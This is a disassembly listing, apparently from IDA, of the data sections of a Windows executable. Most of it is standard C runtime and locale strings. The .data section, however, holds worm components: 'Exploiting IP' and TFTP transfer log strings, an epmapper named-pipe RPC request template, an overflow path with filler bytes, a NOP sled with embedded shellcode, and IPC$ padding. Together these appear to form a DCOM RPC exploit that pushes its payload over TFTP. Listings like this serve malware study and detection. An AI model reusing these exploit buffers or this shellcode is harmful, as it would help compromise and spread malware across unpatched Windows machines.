a___ db '...',0 ; DATA XREF: sub_41C310+9C�o
; sub_41C310+F4�o ...
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41C310+56�o
; sub_4260B0+ED�o
align 4
aDbgrpt_c db 'dbgrpt.c',0 ; DATA XREF: sub_41C310+1F�o
align 4
aSzusermessageN db 'szUserMessage != NULL',0 ; DATA XREF: sub_41C310+13�o
align 4
aInconsistentIo db '("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)',0
; DATA XREF: sub_41E810+162�o
align 4
a_flsbuf_c db '_flsbuf.c',0 ; DATA XREF: sub_41E810+18�o
; sub_41E810+16E�o
align 4
byte_432EE8 db 6 ; DATA XREF: sub_41EA90+8F�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_442F68�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_442F64�o
align 4
aOutput_c db 'output.c',0 ; DATA XREF: sub_41EA90+122�o
align 4
aCh_t0 db 'ch != _T(',27h,'\0',27h,')',0 ; DATA XREF: sub_41EA90+116�o
align 4
aTidtable_c db 'tidtable.c',0 ; DATA XREF: sub_41F930+23�o
; sub_41FA10+29�o
align 4
aInput_c db 'input.c',0 ; DATA XREF: sub_41FBE0+1E�o
; sub_41FBE0+4B�o
a_file_c db '_file.c',0 ; DATA XREF: sub_4210E0+31�o
; sub_4210E0+65�o
a_freebuf_c db '_freebuf.c',0 ; DATA XREF: sub_421440+15�o
align 10h
a_filbuf_c db '_filbuf.c',0 ; DATA XREF: sub_421790+18�o
align 4
a_open_c db '_open.c',0 ; DATA XREF: sub_421980+2E�o
; sub_421980+58�o ...
aFilenameNull db 'filename != NULL',0 ; DATA XREF: sub_421980+25�o
align 4
aStream_c db 'stream.c',0 ; DATA XREF: sub_421D10+C1�o
align 8
dbl_432FD8 dq 1.0 ; DATA XREF: sub_4226A0+37�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_422700+1A�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_422700+6�o
align 4
dbl_433008 dq 0.0 ; DATA XREF: sub_4228E0+9�r
aE000 db 'e+000',0 ; DATA XREF: sub_4229E0:loc_422A58�o
align 4
dword_433018 dd 0 ; DATA XREF: sub_422F40+5D�o
; sub_426F40+58�o ...
dword_43301C dd 0 ; DATA XREF: sub_422F40+35�o
; sub_426F40+35�o ...
dword_433020 dd 0FFFFFFFFh, 423086h, 42308Ch, 0FFFFFFFFh, 42317Ch, 423182h
; DATA XREF: sub_422F40+5�o
dd 545F434Ch, 454D49h, 4E5F434Ch, 52454D55h, 4349h, 4D5F434Ch
dd 54454E4Fh, 595241h, 435F434Ch, 45505954h, 0
aLc_collate db 'LC_COLLATE',0 ; DATA XREF: .data:0044349C�o
align 10h
aLc_all db 'LC_ALL',0 ; DATA XREF: .data:off_443490�o
align 4
asc_433078: ; DATA XREF: .text:loc_423453�o
; sub_423830+83�o
unicode 0, <;>,0
asc_43307C db '=;',0 ; DATA XREF: .text:loc_423381�o
align 10h
aSetlocal_c db 'setlocal.c',0 ; DATA XREF: sub_423690+3E�o
; sub_423830+1B�o
align 4
asc_43308C: ; DATA XREF: sub_423830+5B�o
unicode 0, <=>,0
a___0 db '_.,',0 ; DATA XREF: sub_423B20:loc_423B92�o
a__3: ; DATA XREF: sub_423C80+50�o
; sub_42A100:loc_42A2FB�o
unicode 0, <.>,0
a__4: ; DATA XREF: sub_423C80+25�o
unicode 0, <_>,0
a_sftbuf_c db '_sftbuf.c',0 ; DATA XREF: sub_423FC0+18�o
; sub_423FC0+B2�o ...
align 4
aFlag0Flag1 db 'flag == 0 || flag == 1',0 ; DATA XREF: sub_424120+13�o
align 10h
aFtell_c db 'ftell.c',0 ; DATA XREF: .text:00424C66�o
; sub_424CC0+18�o
aStdenvp_c db 'stdenvp.c',0 ; DATA XREF: sub_425240+5B�o
; sub_425240+D0�o
align 4
aStdargv_c db 'stdargv.c',0 ; DATA XREF: sub_425390+72�o
align 10h
aA_env_c db 'a_env.c',0 ; DATA XREF: sub_4258A0+E8�o
; sub_4258A0+1C6�o
aIoinit_c db 'ioinit.c',0 ; DATA XREF: sub_425AC0+B�o
; sub_425AC0+106�o
align 4
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 10h
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_443694�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVis_0 db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4260B0+1A4�o
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4260B0:loc_4261FA�o
db 0Ah
db 'Program: ',0
align 4
aWinsig_c db 'winsig.c',0 ; DATA XREF: .text:004266F1�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_426B40+5F�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_426B40:loc_426B8B�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_426B40+2A�o
dword_433400 dd 0FFFFFFFFh, 427084h, 42708Ah ; DATA XREF: sub_426F40+5�o
a_getbuf_c db '_getbuf.c',0 ; DATA XREF: sub_427100+16�o
; sub_427100+48�o
align 4
aMbtowc_c db 'mbtowc.c',0 ; DATA XREF: sub_4273B0+21�o
align 4
aMb_cur_max1Mb_ db 'MB_CUR_MAX == 1 || MB_CUR_MAX == 2',0 ; DATA XREF: sub_4273B0+18�o
align 4
aUngetc_c db 'ungetc.c',0 ; DATA XREF: .text:00427936�o
; sub_427990+16�o
align 4
aOsfinfo_c db 'osfinfo.c',0 ; DATA XREF: sub_427BB0+138�o
align 10h
aInittime_c db 'inittime.c',0 ; DATA XREF: sub_429780+13�o
align 4
aInitnum_c db 'initnum.c',0 ; DATA XREF: sub_42A100+1CF�o
; sub_42A100+215�o ...
align 4
aInitmon_c db 'initmon.c',0 ; DATA XREF: sub_42A430+13�o
align 4
aInitctyp_c db 'initctyp.c',0 ; DATA XREF: sub_42A890+52�o
; sub_42A890+6B�o ...
align 10h
aParaguay db 'Paraguay',0
align 4
aUruguay db 'Uruguay',0
aChile db 'Chile',0
align 4
aEcuador db 'Ecuador',0 ; DATA XREF: .data:00443B58�o
aArgentina db 'Argentina',0
align 10h
aPeru db 'Peru',0
align 4
aColombia db 'Colombia',0
align 4
aVenezuela db 'Venezuela',0
align 10h
aDominicanRepub db 'Dominican Republic',0 ; DATA XREF: .data:00443A7C�o
align 4
aSouthAfrica db 'South Africa',0
align 4
aPanama db 'Panama',0 ; DATA XREF: .data:00443A24�o
align 4
aLuxembourg db 'Luxembourg',0
align 4
aCostaRica db 'Costa Rica',0 ; DATA XREF: .data:004439CC�o
align 4
aSwitzerland db 'Switzerland',0
aGuatemala db 'Guatemala',0 ; DATA XREF: .data:00443974�o
align 4
aCanada db 'Canada',0 ; DATA XREF: .data:00443948�o
align 4
aSpanishModernS db 'Spanish - Modern Sort',0 ; DATA XREF: .data:00443914�o
align 4
aAustralia db 'Australia',0 ; DATA XREF: .data:004438F0�o
align 4
aEnglish db 'English',0 ; DATA XREF: .data:004438E8�o
; .data:00443A48�o
aAustria db 'Austria',0 ; DATA XREF: .data:004438C4�o
aGerman db 'German',0 ; DATA XREF: .data:004438BC�o
align 10h
aBelgium db 'Belgium',0 ; DATA XREF: .data:00443898�o
aMexico db 'Mexico',0
align 10h
aSpanish db 'Spanish',0 ; DATA XREF: .data:00443864�o
; .data:0044396C�o ...
aBasque db 'Basque',0 ; DATA XREF: .data:00443838�o
align 10h
aSweden db 'Sweden',0 ; DATA XREF: .data:00443814�o
align 4
aSwedish db 'Swedish',0 ; DATA XREF: .data:0044380C�o
aIceland db 'Iceland',0
aIcelandic db 'Icelandic',0 ; DATA XREF: .data:004437E0�o
align 4
aFrance db 'France',0 ; DATA XREF: .data:004437BC�o
align 4
aFrench db 'French',0 ; DATA XREF: .data:004437B4�o
; .data:00443890�o ...
align 4
aFinland db 'Finland',0
aFinnish db 'Finnish',0 ; DATA XREF: .data:00443788�o
aSpain db 'Spain',0 ; DATA XREF: .data:off_443764�o
align 4
aSpanishTraditi db 'Spanish - Traditional Sort',0 ; DATA XREF: .data:off_44375C�o
align 4
aUnitedStates db 'united-states',0
align 4
aUnitedKingdom db 'united-kingdom',0
align 4
aTrinidadTobago db 'trinidad & tobago',0
align 4
aSouthKorea db 'south-korea',0
aSouthAfrica_0 db 'south-africa',0
align 4
aSouthKorea_0 db 'south korea',0
aSouthAfrica_1 db 'south africa',0
align 4
aSlovak db 'slovak',0
align 4
aPuertoRico db 'puerto-rico',0
aPrChina db 'pr-china',0
align 4
aPrChina_0 db 'pr china',0
align 10h
aNz db 'nz',0
align 4
aNewZealand db 'new-zealand',0
aHongKong db 'hong-kong',0
align 4
aHolland db 'holland',0
aGreatBritain db 'great britain',0
align 4
aEngland db 'england',0
aCzech db 'czech',0
align 4
aChina db 'china',0
align 4
aBritain db 'britain',0 ; DATA XREF: .data:00443C10�o
aAmerica db 'america',0 ; DATA XREF: .data:off_443C08�o
aUsa db 'usa',0
aUs db 'us',0
align 4
aUk db 'uk',0
align 4
aSwiss db 'swiss',0
align 10h
aSwedishFinland db 'swedish-finland',0
aSpanishVenezue db 'spanish-venezuela',0
align 4
aSpanishUruguay db 'spanish-uruguay',0
aSpanishPuertoR db 'spanish-puerto rico',0
aSpanishPeru db 'spanish-peru',0
align 4
aSpanishParagua db 'spanish-paraguay',0
align 4
aSpanishPanama db 'spanish-panama',0
align 4
aSpanishNicarag db 'spanish-nicaragua',0
align 10h
aSpanishModern db 'spanish-modern',0
align 10h
aSpanishMexican db 'spanish-mexican',0
aSpanishHondura db 'spanish-honduras',0
align 4
aSpanishGuatema db 'spanish-guatemala',0
align 4
aSpanishElSalva db 'spanish-el salvador',0
aSpanishEcuador db 'spanish-ecuador',0
aSpanishDominic db 'spanish-dominican republic',0
align 4
aSpanishCostaRi db 'spanish-costa rica',0
align 4
aSpanishColombi db 'spanish-colombia',0
align 10h
aSpanishChile db 'spanish-chile',0
align 10h
aSpanishBolivia db 'spanish-bolivia',0
aSpanishArgenti db 'spanish-argentina',0
align 4
aPortugueseBraz db 'portuguese-brazilian',0
align 4
aNorwegianNynor db 'norwegian-nynorsk',0
align 10h
aNorwegianBokma db 'norwegian-bokmal',0
align 4
aNorwegian db 'norwegian',0
align 10h
aItalianSwiss db 'italian-swiss',0
align 10h
aIrishEnglish db 'irish-english',0
align 10h
aGermanSwiss db 'german-swiss',0
align 10h
aGermanLuxembou db 'german-luxembourg',0
align 4
aGermanLichtens db 'german-lichtenstein',0
aGermanAustrian db 'german-austrian',0
aFrenchSwiss db 'french-swiss',0
align 4
aFrenchLuxembou db 'french-luxembourg',0
align 4
aFrenchCanadian db 'french-canadian',0
aFrenchBelgian db 'french-belgian',0
align 4
aEnglishUsa db 'english-usa',0
aEnglishUs db 'english-us',0
align 4
aEnglishUk db 'english-uk',0
align 10h
aEnglishTrinida db 'english-trinidad y tobago',0
align 4
aEnglishSouthAf db 'english-south africa',0
align 4
aEnglishNz db 'english-nz',0
align 10h
aEnglishJamaica db 'english-jamaica',0
aEnglishIre db 'english-ire',0
aEnglishCaribbe db 'english-caribbean',0
align 10h
aEnglishCan db 'english-can',0
aEnglishBelize db 'english-belize',0
align 4
aEnglishAus db 'english-aus',0
aEnglishAmerica db 'english-american',0
align 4
aDutchBelgian db 'dutch-belgian',0
align 4
aChineseTraditi db 'chinese-traditional',0
aChineseSingapo db 'chinese-singapore',0
align 4
aChineseSimplif db 'chinese-simplified',0
align 4
aChineseHongkon db 'chinese-hongkong',0
align 4
aChinese db 'chinese',0
aChi db 'chi',0
aChh db 'chh',0
aCanadian db 'canadian',0
align 4
aBelgian db 'belgian',0
aAustralian db 'australian',0
align 4
aAmericanEnglis db 'american-english',0
align 10h
aAmericanEngl_0 db 'american english',0
align 4
aAmerican db 'american',0 ; DATA XREF: .data:off_443CC0�o
align 10h
aOcp db 'OCP',0 ; DATA XREF: sub_42B610:loc_42B663�o
aAcp db 'ACP',0 ; DATA XREF: sub_42B610+16�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 10h
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTzset_c db 'tzset.c',0 ; DATA XREF: sub_42BAC0+1D1�o
aTz db 'TZ',0 ; DATA XREF: sub_42BAC0+35�o
align 4
aChsize_c db 'chsize.c',0 ; DATA XREF: sub_42C610+38�o
align 10h
aSize0 db 'size >= 0',0 ; DATA XREF: sub_42C610+2C�o
align 4
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_42D6C0:loc_42D87F�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_42D6C0+19B�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_42D6C0+168�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_42D6C0+125�o
align 4
aHMmSs db 'H:mm:ss',0 ; DATA XREF: .data:00444090�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:0044408C�o
aMDYy db 'M/d/yy',0 ; DATA XREF: .data:00444088�o
align 10h
aPm_1 db 'PM',0 ; DATA XREF: .data:00444084�o
align 4
aAm_0 db 'AM',0 ; DATA XREF: .data:00444080�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:0044407C�o
align 4
aNovember db 'November',0 ; DATA XREF: .data:00444078�o
align 10h
aOctober db 'October',0 ; DATA XREF: .data:00444074�o
aSeptember db 'September',0 ; DATA XREF: .data:00444070�o
align 4
aAugust db 'August',0 ; DATA XREF: .data:0044406C�o
align 4
aJuly db 'July',0 ; DATA XREF: .data:00444068�o
align 4
aJune db 'June',0 ; DATA XREF: .data:00444064�o
align 4
aApril db 'April',0 ; DATA XREF: .data:0044405C�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:00444058�o
align 4
aFebruary db 'February',0 ; DATA XREF: .data:00444054�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:00444050�o
aDec db 'Dec',0 ; DATA XREF: .data:0044404C�o
aNov db 'Nov',0 ; DATA XREF: .data:00444048�o
aOct db 'Oct',0 ; DATA XREF: .data:00444044�o
aSep db 'Sep',0 ; DATA XREF: .data:00444040�o
aAug db 'Aug',0 ; DATA XREF: .data:0044403C�o
aJul db 'Jul',0 ; DATA XREF: .data:00444038�o
aJun db 'Jun',0 ; DATA XREF: .data:00444034�o
aMay db 'May',0 ; DATA XREF: .data:00444030�o
; .data:00444060�o
aApr db 'Apr',0 ; DATA XREF: .data:0044402C�o
aMar db 'Mar',0 ; DATA XREF: .data:00444028�o
aFeb db 'Feb',0 ; DATA XREF: .data:00444024�o
aJan db 'Jan',0 ; DATA XREF: .data:00444020�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:0044401C�o
align 4
aFriday db 'Friday',0 ; DATA XREF: .data:00444018�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:00444014�o
align 10h
aWednesday db 'Wednesday',0 ; DATA XREF: .data:00444010�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: .data:0044400C�o
aMonday db 'Monday',0 ; DATA XREF: .data:00444008�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: .data:00444004�o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:00444000�o
aFri db 'Fri',0 ; DATA XREF: .data:00443FFC�o
aThu db 'Thu',0 ; DATA XREF: .data:00443FF8�o
aWed db 'Wed',0 ; DATA XREF: .data:00443FF4�o
aTue db 'Tue',0 ; DATA XREF: .data:00443FF0�o
aMon db 'Mon',0 ; DATA XREF: .data:00443FEC�o
aSun db 'Sun',0 ; DATA XREF: .data:off_443FE8�o
aAP db 'a/p',0 ; DATA XREF: sub_42EB30:loc_42ED23�o
aAmPm db 'am/pm',0 ; DATA XREF: sub_42EB30:loc_42ED03�o
align 4
aInithelp_c db 'inithelp.c',0 ; DATA XREF: sub_42F050+9C�o
; sub_42F050+F1�o
align 4
dword_433CD8 dd 0FFFFFFFFh, 42F417h, 42F41Dh, 0FFFFFFFFh, 42F496h, 42F49Ch
; DATA XREF: sub_42F2F0+5�o
dword_433CF0 dd 0FFFFFFFFh, 42FF9Dh, 42FFA3h, 0 ; DATA XREF: sub_42FEA0+5�o
dword_433D00 dd 0FFFFFFFFh, 43013Fh, 430145h ; DATA XREF: sub_430040+5�o
aWtombenv_c db 'wtombenv.c',0 ; DATA XREF: sub_430240+44�o
align 4
aA_cmp_c db 'a_cmp.c',0 ; DATA XREF: sub_4302F0+17F�o
aCchcount10Cchc db 'cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0',0
; DATA XREF: sub_4302F0:loc_430463�o
align 10h
dword_433D60 dd 0FFFFFFFFh, 4305CFh, 4305D5h, 0FFFFFFFFh, 43066Dh, 430673h
; DATA XREF: sub_4302F0+5�o
aSetenv_c db 'setenv.c',0 ; DATA XREF: sub_430740+B2�o
; sub_430740+F2�o ...
align 8
dword_433D88 dd 0FFFFFFFFh, 4314CFh, 4314D5h, 0FFFFFFFFh, 431574h, 43157Ah
; DATA XREF: sub_431390+5�o
dd 98h dup(0)
_rdata ends
; Section 3. (virtual address 00034000)
; Virtual size : 00060000 ( 393216.)
; Section size in file : 00060000 ( 393216.)
; Offset to raw data for section: 00034000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 434000h
dword_434000 dd 0 ; DATA XREF: sub_41B2D0+29�o
dword_434004 dd 0 ; DATA XREF: sub_41B2D0+24�o
dword_434008 dd 0 ; DATA XREF: sub_41B2D0+17�o
dd offset sub_4210E0
dd offset sub_4249A0
dword_434014 dd 0 ; DATA XREF: sub_41B2D0:loc_41B2E2�o
dword_434018 dd 0 ; DATA XREF: sub_41B390+76�o
dd offset sub_421210
dword_434020 dd 0 ; DATA XREF: sub_41B390:loc_41B401�o
dword_434024 dd 0 ; DATA XREF: sub_41B390+88�o
dword_434028 dd 2 dup(0) ; DATA XREF: sub_41B390:loc_41B413�o
dword_434030 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: sub_4013F1+E1�o
; sub_4013F1+21B�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43407C dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40119E+123�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4343E0 dd 20h, 0 ; DATA XREF: sub_40119E+136�o
dd 20h, 5C005Ch, 0
off_4343F4 dd offset loc_430056+6 ; DATA XREF: sub_40119E+15D�o
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
dd 0
dword_434434 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_40119E+174�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_40119E+45�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_434544 dd 10016C6h ; DATA XREF: sub_40119E+104�o
dword_434548 dd 100139Dh ; DATA XREF: sub_40119E+FB�o
off_43454C dd offset dword_49005C ; DATA XREF: sub_401000+C�o
dd offset loc_43004F+1
dd 24h
asc_434558: ; DATA XREF: sub_401000+1C�o
unicode 0, <\\>,0
align 10h
off_434560 dd offset dword_49005C ; DATA XREF: sub_4010E6+B�o
dd offset loc_43004F+1
dd 24h
asc_43456C: ; DATA XREF: sub_4010E6+16�o
unicode 0, <\\>,0
align 4
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: sub_4013F1+41�o
align 4
aTftpFileTransf db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: sub_4013F1+29C�o
align 4
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_4013F1+2E9�o
align 10h
aS: ; DATA XREF: .text:0040183C�o
unicode 0, <è>,0
dd 31665800h, 388140C0h, 6D6F6364h, 7881F775h, 30786804h
dd 5EE7572h, 8, 9090E0FFh, 3Fh dup(90909090h), 9090h
dword_4346F4 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: .text:0040191C�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dd 20h, 0
dd 20h, 5C005Ch, 0
dd offset loc_430056+6
a123456111111_0:
unicode 0, <$\123456111111111111111.doc>,0
align 8
dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
a127_0_0_1Ipc: ; DATA XREF: .text:0040185B�o
unicode 0, <127.0.0.1\IPC$\>
dw 4545h
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
